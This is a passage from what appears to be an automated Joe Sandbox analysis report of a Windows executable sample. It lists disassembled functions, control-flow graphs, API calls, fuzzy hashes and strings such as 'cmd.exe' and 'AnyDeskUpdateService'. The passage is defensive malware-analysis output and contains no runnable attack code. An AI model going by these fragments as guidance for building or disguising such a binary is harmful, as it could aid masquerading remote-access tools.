                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6C787E999
                                                                                                        • Part of subcall function 00007FF6C7879A04: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6C7879A29
                                                                                                        • Part of subcall function 00007FF6C78898D4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6C78898FC
                                                                                                        • Part of subcall function 00007FF6C787B1D8: HeapFree.KERNEL32 ref: 00007FF6C787B1EE
                                                                                                        • Part of subcall function 00007FF6C787B1D8: GetLastError.KERNEL32 ref: 00007FF6C787B1F8
                                                                                                        • Part of subcall function 00007FF6C787EBAC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6C787EBEA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo$ErrorFreeHeapLast
                                                                                                      • String ID: .com
                                                                                                      • API String ID: 3231943733-4200470757
                                                                                                      • Opcode ID: 08bbada558672f0a580943a46073b5b52b7eede114a9b68a0c0310e25873d46a
                                                                                                      • Instruction ID: 79f5eb0091ce5b264caf1e8f5650dd99e2ad875987caccffdbbb0137c2e470de
                                                                                                      • Opcode Fuzzy Hash: 08bbada558672f0a580943a46073b5b52b7eede114a9b68a0c0310e25873d46a
                                                                                                      • Instruction Fuzzy Hash: DE51B321B0B64345FA54AF2298512BA6F89AF54BD2F084635FF9FC77D2ED3CE4018220
                                                                                                      Function 00007FF6C7873510 Relevance: 2.6, Strings: 2, Instructions: 92COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                      • String ID: COMSPEC$cmd.exe
                                                                                                      • API String ID: 485612231-2256226045
                                                                                                      • Opcode ID: efe5d603d0a0f45e0f73f16ca7cd868f13a5f76262dd37f7923b94b1df907e1b
                                                                                                      • Instruction ID: 10d2643cdf8e60597de4958f4262bb4ecb966abc16fde0ddd6be3c500b260db2
                                                                                                      • Opcode Fuzzy Hash: efe5d603d0a0f45e0f73f16ca7cd868f13a5f76262dd37f7923b94b1df907e1b
                                                                                                      • Instruction Fuzzy Hash: 0A318D32F0AA4284FB10DFA194815BD3BA2AF88755B454535EF9ED7A96CE38E541C310
                                                                                                      Function 00007FF6C787EBAC Relevance: 16.7, APIs: 11, Instructions: 163synchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 802 7ff6c787ebac-7ff6c787ebdd 803 7ff6c787ebf8-7ff6c787ebfb 802->803 804 7ff6c787ebdf-7ff6c787ebf3 call 7ff6c7874bc4 call 7ff6c7874a58 802->804 803->804 805 7ff6c787ebfd-7ff6c787ec01 803->805 816 7ff6c787ede2-7ff6c787edfe 804->816 807 7ff6c787ec0d-7ff6c787ec2e call 7ff6c7889c38 805->807 808 7ff6c787ec03-7ff6c787ec0b call 7ff6c7874ba4 805->808 817 7ff6c787ec30-7ff6c787ec49 call 7ff6c787b1d8 * 2 807->817 818 7ff6c787ec4e-7ff6c787ec69 call 7ff6c787f004 807->818 808->804 817->816 823 7ff6c787ec6b-7ff6c787ec78 call 7ff6c787b1d8 818->823 824 7ff6c787ec7a-7ff6c787ecfb call 7ff6c7874ba4 call 7ff6c788e320 call 7ff6c7889d9c 818->824 823->817 835 7ff6c787ecfd-7ff6c787ed01 824->835 836 7ff6c787ed52-7ff6c787ed62 call 7ff6c7890050 call 7ff6c7874b38 824->836 838 7ff6c787ed07-7ff6c787ed0a 835->838 839 7ff6c787edff-7ff6c787ee07 call 7ff6c786d434 835->839 859 7ff6c787ed6d-7ff6c787ed70 836->859 860 7ff6c787ed64-7ff6c787ed67 CloseHandle 836->860 842 7ff6c787ed0c-7ff6c787ed28 WaitForSingleObject GetExitCodeProcess 838->842 843 7ff6c787ed84-7ff6c787ed88 838->843 842->836 848 7ff6c787ed2a-7ff6c787ed31 842->848 845 7ff6c787ed8a-7ff6c787ed8d 843->845 846 7ff6c787edae-7ff6c787edb1 843->846 852 7ff6c787ed98-7ff6c787ed9b 845->852 853 7ff6c787ed8f-7ff6c787ed92 CloseHandle 845->853 849 7ff6c787edbc-7ff6c787eddf call 7ff6c787b1d8 * 3 846->849 850 7ff6c787edb3-7ff6c787edb6 CloseHandle 846->850 854 7ff6c787ed3c-7ff6c787ed3f 848->854 855 7ff6c787ed33-7ff6c787ed36 CloseHandle 848->855 849->816 850->849 861 7ff6c787ed9d-7ff6c787eda0 CloseHandle 852->861 862 7ff6c787eda6-7ff6c787eda9 852->862 853->852 856 7ff6c787ed4a-7ff6c787ed4d 854->856 857 7ff6c787ed41-7ff6c787ed44 CloseHandle 854->857 855->854 856->823 857->856 859->823 864 7ff6c787ed76-7ff6c787ed7f CloseHandle 859->864 860->859 861->862 862->823 864->823
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle$CodeErrorExitLastObjectProcessSingleWait_invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 2936579111-0
                                                                                                      • Opcode ID: ed5618520dbe9dbe1534286bed05f644b6f1a12cd40f6c73cd46b7563356a971
                                                                                                      • Instruction ID: c5de495cd401725e9d56151da53d26c483af704fd7e54cec3548a05ac0f57513
                                                                                                      • Opcode Fuzzy Hash: ed5618520dbe9dbe1534286bed05f644b6f1a12cd40f6c73cd46b7563356a971
                                                                                                      • Instruction Fuzzy Hash: 98619122F0AB0686FB10DF61D4442BC2FA6AB45BA5F050531EF9F97B98CE38E415C350
                                                                                                      Function 00007FF6C78585F0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45registryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Event$Source$DeregisterErrorLastRegisterReport
                                                                                                      • String ID: %s failed with %d$AnyDeskUpdateService$AnyDeskUpdateService
                                                                                                      • API String ID: 544316925-1586499718
                                                                                                      • Opcode ID: 3d5dde09e4f0c9a8635dc3b2002a576137b068c398dccda7d93cadec4662d94b
                                                                                                      • Instruction ID: 2c419c78e71541d92e221fa5c9a0bc2d7e85ebdf32d0e2beb77b3116b55a086a
                                                                                                      • Opcode Fuzzy Hash: 3d5dde09e4f0c9a8635dc3b2002a576137b068c398dccda7d93cadec4662d94b
                                                                                                      • Instruction Fuzzy Hash: FE112E32609B8286EBA48F11F8513AAB7A0FB98785F400135EBCE83B54DF7DD158CB00
                                                                                                      Function 00007FF6C787C85C Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 958 7ff6c787c85c-7ff6c787c881 959 7ff6c787c887-7ff6c787c88a 958->959 960 7ff6c787cb4f 958->960 961 7ff6c787c88c-7ff6c787c8be call 7ff6c787498c 959->961 962 7ff6c787c8c3-7ff6c787c8ef 959->962 963 7ff6c787cb51-7ff6c787cb61 960->963 961->963 965 7ff6c787c8fa-7ff6c787c900 962->965 966 7ff6c787c8f1-7ff6c787c8f8 962->966 968 7ff6c787c902-7ff6c787c90b call 7ff6c7881340 965->968 969 7ff6c787c910-7ff6c787c925 call 7ff6c7887ee4 965->969 966->961 966->965 968->969 973 7ff6c787c92b-7ff6c787c934 969->973 974 7ff6c787ca3f-7ff6c787ca48 969->974 973->974 975 7ff6c787c93a-7ff6c787c93e 973->975 976 7ff6c787ca9c-7ff6c787cac1 WriteFile 974->976 977 7ff6c787ca4a-7ff6c787ca50 974->977 978 7ff6c787c940-7ff6c787c948 call 7ff6c7872bf0 975->978 979 7ff6c787c94f-7ff6c787c95a 975->979 982 7ff6c787cacc 976->982 983 7ff6c787cac3-7ff6c787cac9 call 7ff6c7890050 976->983 980 7ff6c787ca88-7ff6c787ca95 call 7ff6c787c314 977->980 981 7ff6c787ca52-7ff6c787ca55 977->981 978->979 988 7ff6c787c95c-7ff6c787c965 979->988 989 7ff6c787c96b-7ff6c787c980 call 7ff6c78902e0 979->989 999 7ff6c787ca9a 980->999 986 7ff6c787ca57-7ff6c787ca5a 981->986 987 7ff6c787ca74-7ff6c787ca86 call 7ff6c787c534 981->987 985 7ff6c787cacf 982->985 983->982 994 7ff6c787cad4 985->994 995 7ff6c787cae0-7ff6c787caea 986->995 996 7ff6c787ca60-7ff6c787ca72 call 7ff6c787c418 986->996 1006 7ff6c787ca2c-7ff6c787ca33 987->1006 988->974 988->989 1010 7ff6c787ca38 989->1010 1011 7ff6c787c986-7ff6c787c98c 989->1011 1000 7ff6c787cad9 994->1000 1002 7ff6c787caec-7ff6c787caf1 995->1002 1003 7ff6c787cb48-7ff6c787cb4d 995->1003 996->1006 999->1006 1000->995 1008 7ff6c787caf3-7ff6c787caf6 1002->1008 1009 7ff6c787cb1f-7ff6c787cb29 1002->1009 1003->963 1006->994 1012 7ff6c787caf8-7ff6c787cb07 1008->1012 1013 7ff6c787cb0f-7ff6c787cb1a call 7ff6c7874b80 1008->1013 1016 7ff6c787cb2b-7ff6c787cb2e 1009->1016 1017 7ff6c787cb30-7ff6c787cb3f 1009->1017 1010->974 1014 7ff6c787ca15-7ff6c787ca27 call 7ff6c787be9c 1011->1014 1015 7ff6c787c992-7ff6c787c995 1011->1015 1012->1013 1013->1009 1014->1006 1019 7ff6c787c997-7ff6c787c99a 1015->1019 1020 7ff6c787c9a0-7ff6c787c9ae 1015->1020 1016->960 1016->1017 1017->1003 1019->1000 1019->1020 1023 7ff6c787ca0c-7ff6c787ca10 1020->1023 1024 7ff6c787c9b0 1020->1024 1023->985 1025 7ff6c787c9b4-7ff6c787c9cb call 7ff6c788812c 1024->1025 1028 7ff6c787c9cd-7ff6c787c9d9 1025->1028 1029 7ff6c787ca03-7ff6c787ca09 call 7ff6c7890050 1025->1029 1030 7ff6c787c9db-7ff6c787c9ed call 7ff6c788812c 1028->1030 1031 7ff6c787c9f8-7ff6c787c9ff 1028->1031 1029->1023 1030->1029 1037 7ff6c787c9ef-7ff6c787c9f6 1030->1037 1031->1023 1034 7ff6c787ca01 1031->1034 1034->1025 1037->1031
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 953036326-0
                                                                                                      • Opcode ID: a7b1067b1fbc3cd28f896cbb9bbc6e4726eaea15fe06cbf518c3a376f57051cb
                                                                                                      • Instruction ID: cb936ad9a98cf083be12c3e5a9323292f125f50131eaf8f3f53b5b71e5ee6c00
                                                                                                      • Opcode Fuzzy Hash: a7b1067b1fbc3cd28f896cbb9bbc6e4726eaea15fe06cbf518c3a376f57051cb
                                                                                                      • Instruction Fuzzy Hash: C991D462F1A65285F750CF6694802BD6FA8BB04B9AF554139EF8FA7684DF38D482C700
                                                                                                      Function 00007FF6C786D344 Relevance: 4.5, APIs: 3, Instructions: 15COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                      • String ID:
                                                                                                      • API String ID: 1703294689-0
                                                                                                      • Opcode ID: 5bc98c1c2021317396186fcc3284e49ba9d5ca290e9d263b723d4fd8b173a28a
                                                                                                      • Instruction ID: c9e188e1dddd914bceea72ac7f33dfff9fd645cadb72de7efb8c74a6bc5eaf9a
                                                                                                      • Opcode Fuzzy Hash: 5bc98c1c2021317396186fcc3284e49ba9d5ca290e9d263b723d4fd8b173a28a
                                                                                                      • Instruction Fuzzy Hash: 57D09E10F2A70792EE586FB0699707C1A116F58757F00183CCB9FC6393EE2EA5098250
                                                                                                      Function 00007FF6C7867B1C Relevance: 3.1, APIs: 2, Instructions: 106COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1278 7ff6c7867b1c-7ff6c7867b37 call 7ff6c7867cf0 1281 7ff6c7867b3d-7ff6c7867b55 call 7ff6c7867cb4 1278->1281 1282 7ff6c7867c73-7ff6c7867c7d call 7ff6c7868430 1278->1282 1287 7ff6c7867b5b-7ff6c7867b5d 1281->1287 1288 7ff6c7867c7e-7ff6c7867c83 call 7ff6c7868430 1281->1288 1282->1288 1289 7ff6c7867ba9-7ff6c7867bac 1287->1289 1290 7ff6c7867b5f-7ff6c7867b77 call 7ff6c7877918 1287->1290 1293 7ff6c7867c88-7ff6c7867c8a call 7ff6c786d480 1288->1293 1294 7ff6c7867bb1-7ff6c7867bc4 call 7ff6c7867e50 call 7ff6c7868418 1289->1294 1296 7ff6c7867b7c-7ff6c7867b7e 1290->1296 1301 7ff6c7867c8f-7ff6c7867ca9 call 7ff6c786d434 call 7ff6c7868324 1293->1301 1309 7ff6c7867bc6-7ff6c7867bd0 call 7ff6c7867db8 1294->1309 1310 7ff6c7867be4-7ff6c7867bf0 call 7ff6c7868420 1294->1310 1299 7ff6c7867b8a-7ff6c7867ba7 call 7ff6c78778d4 1296->1299 1300 7ff6c7867b80-7ff6c7867b85 1296->1300 1299->1294 1303 7ff6c7867c63-7ff6c7867c72 1300->1303 1321 7ff6c7867cad 1301->1321 1309->1310 1318 7ff6c7867bd2-7ff6c7867bde call 7ff6c78903a0 1309->1318 1319 7ff6c7867c06-7ff6c7867c23 call 7ff6c787787c call 7ff6c7877af0 call 7ff6c7877ae8 call 7ff6c7852840 1310->1319 1320 7ff6c7867bf2-7ff6c7867bfc call 7ff6c7867db8 1310->1320 1318->1310 1334 7ff6c7867c28-7ff6c7867c31 call 7ff6c7868580 1319->1334 1320->1319 1328 7ff6c7867bfe-7ff6c7867c01 call 7ff6c786d440 1320->1328 1321->1321 1328->1319 1334->1293 1337 7ff6c7867c33-7ff6c7867c36 1334->1337 1338 7ff6c7867c3d-7ff6c7867c48 call 7ff6c7867e74 1337->1338 1339 7ff6c7867c38 call 7ff6c786d424 1337->1339 1338->1303 1339->1338
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                      • String ID:
                                                                                                      • API String ID: 1236291503-0
                                                                                                      • Opcode ID: bf8581e221747b1aa519da3a3fdda917876ed7866bab429396813271f759fd36
                                                                                                      • Instruction ID: 346d47d21567ee11df87f0d676df2140ee70ba585488f5e2caf9cb3a77abe49e
                                                                                                      • Opcode Fuzzy Hash: bf8581e221747b1aa519da3a3fdda917876ed7866bab429396813271f759fd36
                                                                                                      • Instruction Fuzzy Hash: F8419F21E2F10362FE00AF35A4523B91A91AF55796F444035EBCEC73D7DE2DAA44C391
                                                                                                      Function 00007FF6C787C314 Relevance: 3.1, APIs: 2, Instructions: 74fileCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1343 7ff6c787c314-7ff6c787c37a call 7ff6c7868000 1346 7ff6c787c37c 1343->1346 1347 7ff6c787c3eb-7ff6c787c415 call 7ff6c78676f0 1343->1347 1349 7ff6c787c381-7ff6c787c384 1346->1349 1351 7ff6c787c3aa-7ff6c787c3cf WriteFile 1349->1351 1352 7ff6c787c386-7ff6c787c38d 1349->1352 1353 7ff6c787c3e3-7ff6c787c3e9 call 7ff6c7890050 1351->1353 1354 7ff6c787c3d1-7ff6c787c3da 1351->1354 1355 7ff6c787c398-7ff6c787c3a8 1352->1355 1356 7ff6c787c38f-7ff6c787c395 1352->1356 1353->1347 1354->1347 1357 7ff6c787c3dc-7ff6c787c3df 1354->1357 1355->1349 1355->1351 1356->1355 1357->1346 1359 7ff6c787c3e1 1357->1359 1359->1347
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 442123175-0
                                                                                                      • Opcode ID: b053ca310af3e7b3e959bd461da812ca189cf57c899e4e5267733b9c995ffed1
                                                                                                      • Instruction ID: 04d3c76d6ab6fffd2dc8b0dc01f4d06d2ce03a7a1ff00426a05d5c281a3810c8
                                                                                                      • Opcode Fuzzy Hash: b053ca310af3e7b3e959bd461da812ca189cf57c899e4e5267733b9c995ffed1
                                                                                                      • Instruction Fuzzy Hash: 1831E132B1AB819ADB509F25E8802A97BA4FB58785F854032EF8EC3754DF3CD516CB00
                                                                                                      Function 00007FF6C787AFD4 Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1361 7ff6c787afd4-7ff6c787afef 1362 7ff6c787aff2-7ff6c787b01b 1361->1362 1363 7ff6c787b01d-7ff6c787b022 1362->1363 1364 7ff6c787b027-7ff6c787b030 1362->1364 1365 7ff6c787b0b2-7ff6c787b0bb 1363->1365 1366 7ff6c787b048 1364->1366 1367 7ff6c787b032-7ff6c787b035 1364->1367 1365->1362 1369 7ff6c787b0c1-7ff6c787b0db 1365->1369 1368 7ff6c787b04d-7ff6c787b05e GetStdHandle 1366->1368 1370 7ff6c787b037-7ff6c787b03f 1367->1370 1371 7ff6c787b041-7ff6c787b046 1367->1371 1372 7ff6c787b08d-7ff6c787b0a5 1368->1372 1373 7ff6c787b060-7ff6c787b06b GetFileType 1368->1373 1370->1368 1371->1368 1372->1365 1375 7ff6c787b0a7-7ff6c787b0ab 1372->1375 1373->1372 1374 7ff6c787b06d-7ff6c787b078 1373->1374 1376 7ff6c787b07a-7ff6c787b07f 1374->1376 1377 7ff6c787b081-7ff6c787b084 1374->1377 1375->1365 1376->1365 1377->1365 1378 7ff6c787b086-7ff6c787b08b 1377->1378 1378->1365
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileHandleType
                                                                                                      • String ID:
                                                                                                      • API String ID: 3000768030-0
                                                                                                      • Opcode ID: 5e57838b2dce20432395441fed3a29f839eb20010de2f3c076eaf79001dc18ea
                                                                                                      • Instruction ID: 5d506c672a4c669cc9739aa27a683594f983ccce9878fe32f9e82ec2fc4419ac
                                                                                                      • Opcode Fuzzy Hash: 5e57838b2dce20432395441fed3a29f839eb20010de2f3c076eaf79001dc18ea
                                                                                                      • Instruction Fuzzy Hash: BE314121A19B4681D7608F2485905796E51FB45BB6F640339EBFF873E0CF39E4A1D341
                                                                                                      Function 00007FF6C7867A30 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c7850000_SecuriteInfo.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                                                                      • String ID:
                                                                                                      • API String ID: 3548387204-0
                                                                                                      • Opcode ID: 0b4fd6439aa5f74e8bd80266028e772a311ec34cef78dfd92916b01d919c9ec4
                                                                                                      • Instruction ID: 6c90cdf1eb3e723f2dd80aa3810c80eb7c34e82bd46163374984e4aa4bafb769
                                                                                                      • Opcode Fuzzy Hash: 0b4fd6439aa5f74e8bd80266028e772a311ec34cef78dfd92916b01d919c9ec4
                                                                                                      • Instruction Fuzzy Hash: 7011D051E2F103A5FA947FB298162FD1DA14F50343F800430E7CEC62C3EE2CBA8146A2
                                                                                                      Function 00007FF6C788447C Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2170274377.00007FF6C7851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6C7850000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2170261774.00007FF6C7850000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170274377.00007FF6C78AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170331863.00007FF6C78AC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2170344849.00007FF6C78AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
